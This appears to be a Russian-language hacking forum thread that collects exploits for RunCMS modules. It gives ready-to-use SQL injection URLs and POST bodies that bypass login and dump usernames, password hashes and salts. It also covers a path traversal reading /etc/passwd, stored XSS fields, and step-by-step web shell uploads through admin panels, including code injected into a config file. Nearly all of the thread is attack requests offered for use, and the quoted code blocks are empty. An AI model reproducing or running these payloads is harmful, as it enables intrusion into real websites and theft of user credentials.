![]() |
banners - дефолтный модуль RunCMS
Версия: 1.4 SQL-INJ Уязвимый скрипт: index.php Зависимость: magic_quotes = off Зависимость: Включенный модуль banners Вначале обойдем авторизацию Запрос [POST \ GET]: login=q' union select 1,2,3,0x393030313530393833636432346662306436393633 6637643238653137663732#&pass=abc где 0x393030313530393833636432346662306436393633663764 3238653137663732 - хэш от abc, переведенный в число. Уязвимый кусок кода: PHP код:
Уязвимый кусок кода: PHP код:
-1 union select uname,0,0,0,0 from runcms_users limit 0,1 -1 union select pass,0,0,0,0 from runcms_users limit 0,1 -1 union select pwdsalt,0,0,0,0 from runcms_users limit 0,1 Переведем в число: uname: 0x2d3120756e696f6e2073656c65637420756e616d652c302c 302c302c302066726f6d2072756e636d735f7573657273206c 696d697420302c31 pass: 0x2d3120756e696f6e2073656c65637420706173732c302c30 2c302c302066726f6d2072756e636d735f7573657273206c69 6d697420302c31 pwdsalt: 0x2d3120756e696f6e2073656c6563742070776473616c742c 302c302c302c302066726f6d2072756e636d735f7573657273 206c696d697420302c31 Итого общий запрос: login=q' union select 0x2d3120756e696f6e2073656c65637420756e616d652c302c 302c302c302066726f6d2072756e636d735f7573657273206c 696d697420302c31,2,3,0x393030313530393833636432346 6623064363936336637643238653137663732#&pass=abc |
messages - дефолтный модуль RunCMS
Версия: 1.02 Blind SQL-INJ Уязвимый скрипт: read.php и readsend.php Посимвольный брут Запрос: /modules/messages/read.php?start=0&total_messages=1&sort=msg_time+an d+(select+ascii(substring(pass,1,1))+from+runcms_u sers+limit+0,1)>100&by=DESC Уязвимый кусок кода: PHP код:
|
Members List
Версия: 1.1 Уязвимый скрипт: index.php Запрос: /modules/memberslist/index.php?query=!')+union+select+1,pass+from+runcm s_users%23 Уязвимый кусок кода: PHP код:
|
Arcade
Версия: 0.51 Уязвимый скрипт: index.php Запрос: /modules/arcade/index.php?act=show_cat&cat_id=-1+union+select+1,pwdsalt,pass,4,uname,6,7,8,9,10,1 1,12,13,14,15+from+runcms_users%23 Уязвимый кусок кода: PHP код:
Уязвимый кусок кода: PHP код:
Уязвимый кусок кода: PHP код:
Зависимость: magic_quotes = off Запрос: /modules/arcade/index.php?act=download_game&game=/../../../../../../../../../../../../../../../../../../../etc/passwd%00 Уязвимый кусок кода: PHP код:
|
Book Reviews
Версия: 0.3 Уязвимый скрипт: index.php Запрос: Код:
/modules/mareviews/?func=catlist&category=%252d%2531%2527%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2563%256f%256e%2563%2561%2574%255f%2577%2573%2528%2530%2578%2533%2561%252c%2570%2561%2573%2573%252c%2570%2577%2564%2573%2561%256c%2574%2529%252c%2575%256e%2561%256d%2565%252c%2533%2520%2566%2572%256f%256d%2520%2572%2575%256e%2563%256d%2573%255f%2575%2573%2565%2572%2573%2523PHP код:
|
RunCMS 2.1
Active XSS http://yoursite/edituser.php Поле address varchar(150) Поле town varchar(60) Заливка шелла через админку http://yoursite/modules/system/admin.php?fct=tpleditor Заливаем zip архив с шеллом. Шелл будет залит сюда: http://yoursite/themes/shell.php --------------------------------------------------------- http://yoursite/modules/system/admin.php?fct=blocksadmin Добавляем новый блок: Content - сюда вставляем инклюд шелла, например: PHP код:
Заходим на страницу содержащую блок или смотрим его preview. Шелл будет залит сюда: http://yoursite/modules/system/shell.php Player#1 (c) |
Run CMS 2.1
www.runcms.org SQL-Injection file:/modules/forum/reply.php PHP код:
PHP код:
Код:
GET /modules/forum/reply.php?forum=3&post_id=-4+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18&topic_id=4&viewmode=flat&order=0need: administrator account, mq=off Код:
/modules/system/admin.php?fct=tpleditor&op=file_edit&module=../../../[local_file]%00Full Path Disclosure Код:
/footer.phpupload shell need: administrator account Логинимся.. Идём в System Admin -> Theme Editor -> архивируем шелл (*.zip) -> жмём upload шелл будет доступен по адресу http://site.ru/themes/shell.php |
Run CMS 2.1
SQL-Injection need:user account file:/modules/pm/print.php PHP код:
Код:
/modules/pm/print.php?op=print_pn&msg_id=-0+union+select+1,2,3,4,5,6-------------- Код:
/modules/forum/edit.php?forum=1&post_id=-1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18&topic_id=4&viewmode=flat&order=0 |
Заливка шелла в последнюю на данный момент версию RunCMS 2.2.2. Нужны права Админа. Идем в
Архив файлов -> Основные настройки -> Допустимые форматы скриншота (modules/downloads/admin/index.php?op=downloadsConfigAdmin) Это поле является предпоследней строкой кода в файле: \modules\downloads\cache\config.php Вписываем: Код:
.gif|.jpg|.bmp|.png'; phpinfo(); ?> |
up! какой метод хэширования юзается?
|
| Время: 10:31 |